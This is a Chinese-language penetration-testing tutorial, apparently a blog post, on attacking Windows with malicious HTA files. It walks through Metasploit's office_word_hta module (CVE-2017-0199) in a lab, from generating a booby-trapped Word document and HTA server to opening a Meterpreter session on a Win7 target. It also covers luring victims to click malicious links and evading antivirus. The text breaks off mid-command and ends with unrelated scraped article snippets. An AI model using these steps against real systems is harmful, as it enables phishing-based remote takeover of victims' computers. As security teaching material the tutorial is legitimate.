Kali 渗透测试:利用HTA文件进行渗透攻击
Kali 渗透测试:利用HTA文件进行渗透攻击
由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个正常的行为,如让访问伪造网站的受害者下载一个插件,但是这个文件不能是EXE文件这种很容易被发现的文件, 因此,HTML应用程序(HTML Application,HTA)文件就成了最好的选择。
HTA文件可以使用HTML中的绝大多数标签、脚本等。直接将HTML保存成HTA文件,就是一个能够独立运行的软件。与普通HTML网页相比, HTA文件多了一个“HTA:APPLICATION”标签,这个标签提供了一系列面向软件的功能。最重要的是, 它能够让你访问客户的计算机,而不用担心安全的限制。运行HTA文件,会调用%SystemRoot%\system32\mshta.exe(HTML Applicationhost)执行。
下面是一个HTA文件的代码:
<!--example1.hta-->
<html><head><title>Hello my first HTA</title></head><body><center><p>HTA</p><p>HTML Application</p></center></body>
</html>
把上面的代码复制到文本编辑器中,然后保存为HTA文件,直接双击HTA文件就可以看到效果,如下图所示:
利用HTA文件进行攻击的方式也很简单,黑客只需要构造一个包含HTA恶意文件的恶意网址,然后诱使受害者单击这个网址,受害者的计算机就会运行里面的恶意文件,如下图所示:
如果受害者单击保存文件,如果计算机中安装了杀毒软件,该HTA也可能被查杀。但这并不意味着无计可施了,利用CVE-2017-0199漏洞将恶意的HTA文件载入Word文件,当受害者使用有漏洞的Office打开Word文件时,就会自动运行恶意的HTA文件,从而被成功渗透。
Metasploit提供了exploit/windows/fileformat/office_word_hta模块,这个模块包含两个功能:一个功能是启动一个Web服务器,里面包含恶意的HTA文件;另一个功能是生成一个包含这个恶意HTA文件的Word文件。无论受害者是访问了黑客提供的恶意网址,还是打开了这个恶意Word文件,都会被渗透。
使用Metasploit模拟这个过程如下:
实验环境
操作机:Linux kali 5.10.0 IP :192.168.68.125
靶机:Win7
操作步骤:
1. 在Kali主机中,启动metasploit
在命令行输入如下命令:
┌──(kali㉿kali)-[~]
└─$ msfconsole
2. 启动office_word_hta模块
进入metasploit界面,输入如下命令:
msf6 > use exploit/windows/fileformat/office_word_hta
使用show targets 命令查看这个模块的攻击目标如下图所示:
使用show options命令查看这个模块的参数,如下图所示:
这个模块的使用方法很简单,可以使用默认参数。
3. run命令启动这个模块
使用run命令启动这个模块,命令如下:
msf6 exploit(windows/fileformat/office_word_hta) > run
从图中看到,箭头所指,其中msf.doc就是生成的包含恶意HTA文件的Word文件:
[+] msf.doc stored at /home/kali/.msf4/local/msf.doc
而LocalIP就是包含恶意HTA文件的Web服务器的地址:
[+] Local IP: http://192.168.68.125:8080/default.hta
4. 模拟受害者单击恶意链接,访问http://192.168.68.125:8080/default/hta
在Win7主机的浏览器中访问这个Local IP, 如下图所示:
5. 回到Kali主机,连接成功
在上图中单击“运行®”按钮,回到Kali主机可以看到,恶意软件已经成功获得了Meterpreter的控制权限。如果没有显示,可以按Enter健测试。下面是成功建立连接会话后的显示结果。
msf6 exploit(windows/fileformat/office_word_hta) >
[*] Sending stage (175174 bytes) to 192.168.68.159
[*] Meterpreter session 1 opened (192.168.68.125:4444 -> 192.168.68.159:49222) at 2022-05-13 04:44:18 -0400
如下图所示:
在Kali会话,执行一些cmd命令对靶机进行操作,如下图所示:
不能直接运行default.hta文件的情况
现在有很多种浏览器,它们对HTA文件的处理方式不同。如在某些浏览器中,可能看到的是如下图所示情况,没有“运行”按钮。
**备注:**如果default.hta文件保存之后,没有被查杀,直接双击运行,也一样可以正常连接到Kali主机,效果跟在浏览器直接访问一样,这里不再赘述。
如果计算机中安装了杀毒软件,该HTA也可能被查杀。前面提到过还有CVE-2017-0199漏洞的存在,这时可以首先使用cp命令将msf.doc文件复制到一个可以访问的目录(如/var/www/html中),在Kali操作机中输入如下命令:
┌──(root
Kali 渗透测试:利用HTA文件进行渗透攻击相关推荐
- 基于Android设备的Kali Linux渗透测试教程第1章渗透测试
基于Android设备的Kali Linux渗透测试教程第1章渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者所采用的技术与方法,攻击目标系统的安全控制措施,并取得访问 ...
- 渗透测试入门9之域渗透
渗透测试入门9之域渗透 信息搜集 powerview.ps1 Get-NetDomain - gets the name of the current user's domain Get-NetFor ...
- 渗透测试八个步骤【渗透测试流程】
渗透测试遵循软件测试的基本流程,但由于其测试过程与目标的特殊性,在具体实现步骤上渗透测试与常见软件测试并不相同.渗透测试流程主要包括8个步骤,如下图所示: 下面结合上图介绍每一个步骤所要完成的任务. ...
- 渗透测试入门8之端口渗透
渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...
- Kali渗透测试——利用metasploit攻击靶机WinXP SP1
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...
- 《Kali Linux高级渗透测试原书第2版》网络渗透测试技术书 无线网络渗透测试详解 黑客攻击与防范实战从入门到精通书
内容简介: KaliLinux面向专业的渗透测试和审计,集成了大量挑选的检测工具.本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者"杀链"采取的具体 ...
- 渗透测试中的文件传输技巧
目录 搭建 HTTP server Python PHP 5.4+ Ruby Ruby 1.9.2+ Perl busybox httpd Download files from HTTP serve ...
- termux使用教程python手机_渗透测试|利用手机攻击电脑(Termux终端初体验)
至少我们曾经在一起过. 来自:一言 介绍 Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby ...
- Kali Linux 无线渗透测试入门指南 第六章 攻击客户端
第六章 攻击客户端 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 安全强度取决于最弱的部分. – 信息安全领域 ...
最新文章
- POJ2932Coneology(计算几何、平面扫描)
- java 对 mongoDB 分组统计操作 以及一些常用操作
- scanf(“%s“)真的只开读入字符串大小就可以了吗??
- hdoj-1004-Let the Balloon Rise(map排序)
- php zend 多个站错误,php – 如何显示Zend框架抛出的异常错误
- MiniGUI编程--组合框
- 802.11的CSMA/CA机制
- Linux软raid创建
- 视觉培训4 完成手写识别项目
- StringUtil工具类之去除所有的空白字符
- 鸡汤来了,成为数据分析师的快速指南
- 聊聊H5浏览器实现扫一扫
- 【matlab算法原理详解】车牌识别算法
- 人物画像及“七步人物角色法”
- elasticsearch问题: SERVICE_UNAVAILABLE/1/state not recovered /initialized
- Pytorch 框架
- python去除pdf水印_聊聊 Python 操作PDF的几种方法(合并、拆分、水印、加密)
- IP归属地查询(基于本地IP库实现)
- 超低功耗MCU的选择方法
- IPsec+预共享密钥的IKE野蛮模式
热门文章